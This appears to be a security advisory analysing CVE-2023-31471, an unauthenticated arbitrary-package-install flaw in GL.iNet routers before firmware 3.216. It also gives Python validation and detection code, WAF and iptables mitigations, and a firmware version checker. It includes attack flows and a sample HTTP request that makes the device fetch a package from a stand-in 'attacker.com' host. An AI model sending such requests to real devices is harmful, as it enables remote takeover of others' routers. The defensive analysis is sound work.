CVE-2023-31471
CVSS Vector (v3.1)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: High
- Integrity: High
- Availability: High
Description
An issue was discovered on GL.iNet devices before 3.216. Through the software installation feature, it is possible to install arbitrary software, such as a reverse shell, because the restrictions on the available package list are limited to client-side verification. It is possible to install software from the filesystem, the package list, or a URL.
CVE-2023-31471: Professional Cybersecurity Analysis
Executive Summary
CVE-2023-31471 represents a critical security vulnerability in GL.iNet devices (firmware versions prior to 3.216) that enables arbitrary code execution through insufficient server-side validation of software installation requests. With a CVSS score of 9.8, this vulnerability poses an immediate and severe threat to affected network infrastructure.
1. Vulnerability Assessment and Severity Evaluation
Severity Classification
- CVSS Score: 9.8 (Critical)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Impact: Complete system compromise (CIA triad fully compromised)
Technical Assessment
The vulnerability stems from a fundamental security architecture flaw: relying exclusively on client-side validation for software installation authorization. This represents a violation of the security principle "never trust the client."
Key Weaknesses:
- Client-side only validation of package sources
- No server-side verification of package authenticity
- Unrestricted installation from multiple sources (filesystem, URL, package list)
- Lack of cryptographic signature verification
- Insufficient access controls on installation functionality
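The hardened counterpart to the first four weaknesses, as an added example that is not GL.iNet firmware code: the allow-list of installable packages and the expected digest of each package are held by the server, so a client that edits its own request (adding a URL or filesystem path, or renaming a package) gains nothing. The request field names follow the hypothetical request shown later in this analysis; the manifest, sample package bytes and package names are constructed.

```python
"""Server-side validation for a package-install request (added illustration)."""
import hashlib
import hmac
import re
from dataclasses import dataclass

# Constructed package payload standing in for a real .ipk fetched from the
# vendor repository; its digest seeds the server-side manifest below.
SAMPLE_PACKAGE = b"constructed-ipk-bytes-for-openvpn-openssl"

# Hypothetical server-side manifest: package name -> expected SHA-256 hex digest.
# In production this comes from a signed repository index, never from the client.
TRUSTED_MANIFEST = {
    "openvpn-openssl": hashlib.sha256(SAMPLE_PACKAGE).hexdigest(),
    "wireguard-tools": "0" * 64,  # placeholder digest for a second allow-listed package
}

# Fields a client might use to choose its own package source; none are honoured.
CLIENT_SOURCE_FIELDS = ("package_url", "package_path", "url", "path", "file")

# opkg-style package names: lowercase alphanumerics plus . + -, no slashes or spaces.
_NAME_RE = re.compile(r"^[a-z0-9][a-z0-9.+-]{0,63}$")


@dataclass(frozen=True)
class InstallDecision:
    allowed: bool
    reason: str


def validate_install_request(request: dict, manifest=TRUSTED_MANIFEST) -> InstallDecision:
    """Decide whether an install request may proceed, using only server-held data."""
    for field in CLIENT_SOURCE_FIELDS:
        if field in request:
            return InstallDecision(False, f"client-supplied source field '{field}' is rejected")
    name = request.get("package_name")
    if not isinstance(name, str) or not _NAME_RE.match(name):
        return InstallDecision(False, "malformed package name")
    if name not in manifest:
        return InstallDecision(False, f"'{name}' is not in the server-side allow-list")
    return InstallDecision(True, "allowed: source and digest are taken from the manifest")


def verify_downloaded_package(name: str, data: bytes, manifest=TRUSTED_MANIFEST) -> bool:
    """After the server fetches the package from its own configured repository,
    refuse to install unless the bytes match the manifest digest."""
    expected = manifest.get(name)
    if expected is None:
        return False
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    # The hypothetical forged request from the "Direct API Manipulation" section.
    forged = {"package_url": "http://attacker.com/malicious.ipk",
              "package_name": "legitimate-looking-name"}
    print(validate_install_request(forged))
    print(validate_install_request({"package_name": "openvpn-openssl"}))
    print(verify_downloaded_package("openvpn-openssl", SAMPLE_PACKAGE))
```

The two checks are deliberately separate: the request is validated before any network activity, and the digest is checked on the bytes the server itself downloaded, so neither the package name nor the source can be steered from the client side.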
Risk Rating Justification
The 9.8 CVSS score is appropriate due to:
- No authentication required for exploitation
- Remote exploitation capability via network access
- Complete system compromise potential (RCE)
- Network device targeting (affects infrastructure security posture)
- Ease of exploitation (low technical barrier)
2. Attack Vectors and Exploitation Methods
Primary Attack Vectors
Vector 1: Malicious Package Installation via URL
Attack Flow:
1. Attacker identifies vulnerable GL.iNet device (< v3.216)
2. Attacker crafts malicious package (e.g., reverse shell)
3. Attacker hosts package on controlled server
4. Attacker bypasses client-side validation (intercept/modify requests)
5. Attacker submits installation request with malicious URL
6. Device downloads and installs unauthorized package
7. Attacker gains remote code execution
Vector 2: Local Filesystem Exploitation
- Upload malicious package to accessible filesystem location
- Trigger installation from local path
- Bypass package list restrictions entirely
Vector 3: Package List Manipulation
- Intercept legitimate package installation requests
- Modify package identifiers to point to malicious packages
- Exploit lack of integrity checking
Exploitation Techniques
Method 1: Direct API Manipulation
POST /cgi-bin/api/install HTTP/1.1
Host: [target-device-ip]
Content-Type: application/json
{
"package_url": "http://attacker.com/malicious.ipk",
"package_name": "legitimate-looking-name"
}
Method 2: Man-in-the-Middle (MitM)
- Intercept legitimate installation requests
- Replace package sources with malicious alternatives
- Particularly effective on unencrypted management interfaces
Method 3: Cross-Site Request Forgery (CSRF) Chain
- Craft malicious web page that triggers installation
- Social engineer administrator to visit page while authenticated
- Automated exploitation without direct device access
Post-Exploitation Capabilities
Once arbitrary code execution is achieved:
- Persistent backdoor installation
- Network traffic interception (man-in-the-middle positioning)
- Lateral movement to connected networks
- Credential harvesting from device configuration
- Botnet recruitment for DDoS attacks
- VPN/tunnel compromise (common GL.iNet use case)
3. Affected Systems and Software Versions
Affected Products
GL.iNet Router/Network Devices:
- All models running firmware < version 3.216
Commonly Affected Models
GL.iNet manufactures various travel routers and IoT gateways, including:
- GL-AR750S (Slate)
- GL-MT300N-V2 (Mango)
- GL-AR300M (Shadow)
- GL-MT1300 (Beryl)
- GL-AXT1800 (Slate AX)
- GL-A1300 (Slate Plus)
- Other models in the product line
Deployment Contexts at Risk
- Remote workers using GL.iNet VPN routers
- IoT deployments with GL.iNet gateway devices
- Travel/mobile networks (common use case)
- Small office/home office (SOHO) environments
- Industrial IoT implementations
- Penetration testing equipment (ironically, security professionals use these devices)
Version Identification
Administrators can check the firmware version via:
- Web interface: System → Firmware
- SSH: cat /etc/glversion
- API endpoint: /cgi-bin/api/system/info
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1)
1. Firmware Update
# Verify current version
cat /etc/glversion
# Update to version 3.216 or later via:
# - Web UI: System → Upgrade
# - Manual download from https://www.gl-inet.com
Critical: Update to firmware version 3.216 or later immediately.
2. Network Isolation
- Place affected devices behind firewall rules
- Restrict management interface access to trusted networks only
- Implement VLANs to segment vulnerable devices
3. Access Control Hardening
# Disable remote management if not required
# Change default credentials immediately
# Implement strong authentication
Short-term Mitigations (Priority 2)
4. Monitoring and Detection
Deploy monitoring for:
- Unexpected package installation attempts
- Unusual outbound connections from devices
- Changes to installed package lists
- Anomalous process execution
Detection Signatures:
# Monitor for suspicious package installations
LOG: "package install" AND source NOT IN [trusted_repos]
# Network-based detection
ALERT: HTTP POST to /cgi-bin/api/install from untrusted sources
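The two detection signatures above turned into runnable logic over constructed sample log lines, as an added example that is not a GL.iNet or vendor rule. The opkg-style "package install ... from ..." line format, the trusted repository host and the administrator network are assumptions; the /cgi-bin/api/install path is the hypothetical endpoint used elsewhere in this analysis.

```python
"""Two log-based detections for unexpected package installation (added illustration)."""
import ipaddress
import re
from urllib.parse import urlparse

# Constructed allow-lists: the only repository host packages may come from, and
# the network administrators are expected to manage the device from.
TRUSTED_REPO_HOSTS = {"repo.trusted.example"}
ADMIN_NETWORKS = [ipaddress.ip_network("192.168.8.0/24")]

# Assumed log shape 1: the package manager records what it installed and where from.
INSTALL_RE = re.compile(r"opkg: package install (?P<pkg>\S+) from (?P<src>\S+)")
# Assumed log shape 2: the web server logs a POST to the install endpoint with the client IP.
HTTP_RE = re.compile(r'(?P<ip>\d+(?:\.\d+){3}) - - "POST (?P<path>/cgi-bin/api/install)\b')

# Constructed sample lines: one legitimate install, one install driven from an
# external address, one install from a local file, and one unrelated request.
SAMPLE_LOGS = [
    'Jan 10 10:00:00 router uhttpd: 192.168.8.20 - - "POST /cgi-bin/api/install HTTP/1.1" 200',
    'Jan 10 10:00:01 router opkg: package install openvpn-openssl from https://repo.trusted.example/packages/openvpn-openssl.ipk',
    'Jan 10 10:05:10 router uhttpd: 203.0.113.9 - - "POST /cgi-bin/api/install HTTP/1.1" 200',
    'Jan 10 10:05:11 router opkg: package install unknown-tool from http://203.0.113.9/x.ipk',
    'Jan 10 10:07:30 router opkg: package install helper from /tmp/helper.ipk',
    'Jan 10 10:08:00 router uhttpd: 192.168.8.20 - - "GET /cgi-bin/api/system/info HTTP/1.1" 200',
]


def source_is_trusted(src: str) -> bool:
    """Only a URL whose host is an allow-listed repository counts as trusted;
    a bare filesystem path (no scheme) never does."""
    parsed = urlparse(src)
    if parsed.scheme not in ("http", "https") or parsed.hostname is None:
        return False
    return parsed.hostname in TRUSTED_REPO_HOSTS


def analyse(lines):
    """Return (signature, detail, line) tuples for every line that trips a rule."""
    alerts = []
    for line in lines:
        m = INSTALL_RE.search(line)
        if m:
            if not source_is_trusted(m.group("src")):
                alerts.append(("untrusted-package-source", m.group("pkg"), line))
            continue
        m = HTTP_RE.search(line)
        if m:
            client = ipaddress.ip_address(m.group("ip"))
            if not any(client in net for net in ADMIN_NETWORKS):
                alerts.append(("install-endpoint-from-untrusted-ip", str(client), line))
    return alerts


if __name__ == "__main__":
    for signature, detail, line in analyse(SAMPLE_LOGS):
        print(f"{signature}: {detail}\n    {line}")
```

The host check compares the parsed hostname exactly against the allow-list, so a look-alike such as repo.trusted.example.attacker.example does not pass; a substring match on the raw URL would.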
5. Network Segmentation
- Isolate GL.iNet devices on dedicated management VLAN
- Implement strict firewall rules:
- Allow only necessary management protocols
- Whitelist administrator IP addresses
- Block outbound connections to untrusted package sources
6. Web Application Firewall (WAF) Rules
# Block suspicious installation requests
Rule: Block POST requests to /cgi-bin/api/install
containing external URLs in package_url parameter
Long-term Security Measures (Priority 3)
7. Security Architecture Review
- Implement defense-in-depth strategies
- Regular vulnerability assessments
- Penetration testing of network infrastructure
8. Configuration Management
- Maintain inventory of all GL.iNet devices
- Automated firmware version tracking
- Centralized configuration management
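One way to do the automated firmware version tracking called for here, using the /etc/glversion check from the Version Identification section, as an added example that is not a GL.iNet tool. It assumes /etc/glversion holds a dotted version string, possibly followed by a build suffix; the inventory, hostnames and versions are constructed (3.99 is included only to show why versions must be compared numerically rather than as strings).

```python
"""Fleet check against the 3.216 fix line named in this advisory (added illustration)."""
import re

FIXED_VERSION = (3, 216)  # first firmware version the advisory text treats as fixed

_VERSION_RE = re.compile(r"\s*(\d+(?:\.\d+)*)")


def parse_version(text: str):
    """'3.215', '3.216\\n' or '3.216-rc1' -> tuple of ints. Tuples compare
    numerically, so 3.99 sorts before 3.216; a plain string comparison would
    put it after and silently miss an affected device."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def needs_update(version_text: str) -> bool:
    """True when the firmware is older than 3.216, i.e. inside the affected range."""
    return parse_version(version_text) < FIXED_VERSION


# Constructed inventory: hostname -> raw contents of /etc/glversion collected over SSH.
INVENTORY = {
    "slate-travel-01": "3.215\n",
    "mango-lab-02": "3.99\n",
    "beryl-office-03": "3.216\n",
    "slate-ax-home-04": "4.2.0\n",
}


def devices_needing_update(inventory=INVENTORY):
    """Sorted hostnames still running firmware below the fix line."""
    return sorted(host for host, ver in inventory.items() if needs_update(ver))


if __name__ == "__main__":
    for host in devices_needing_update():
        print(f"{host}: {INVENTORY[host].strip()} -> update to 3.216 or later")
```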
9. Incident Response Preparation
- Develop playbooks for device compromise scenarios
- Establish baseline configurations for forensic comparison
- Implement automated backup procedures
Compensating Controls (If Update Not Immediately Possible)
# 1. Disable software installation feature entirely
# (via custom firewall rules or interface modification)
# 2. Implement strict egress filtering: limit the device's own outbound HTTP/HTTPS
# to trusted repositories. The OUTPUT chain covers traffic the router itself
# originates, not traffic it forwards for LAN clients.
# Replace <trusted-repo-ip> (placeholder) with the address of each repository you allow.
iptables -A OUTPUT -p tcp -d <trusted-repo-ip> --dport 443 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 80 -j DROP
iptables -A OUTPUT -p tcp --dport 443 -j DROP
# These rules do not survive a reboot unless added to the persistent firewall
# configuration (on OpenWrt-based firmware, e.g. /etc/firewall.user).
# 3. Enable comprehensive logging
# Configure syslog forwarding to SIEM
5. Impact on Cybersecurity Landscape
Strategic Implications
1. IoT/Edge Device Security Concerns
This vulnerability exemplifies ongoing challenges in IoT security:
- Insufficient security-by-design principles
- Client-side validation dependencies
- Limited security resources in embedded systems
- Difficulty in patch deployment for distributed devices
2. Supply Chain Considerations
- GL.iNet devices are popular in security/privacy communities
- Compromise could affect security-conscious users
- Potential for targeted attacks against specific user demographics
- Trust implications for "security-focused" hardware vendors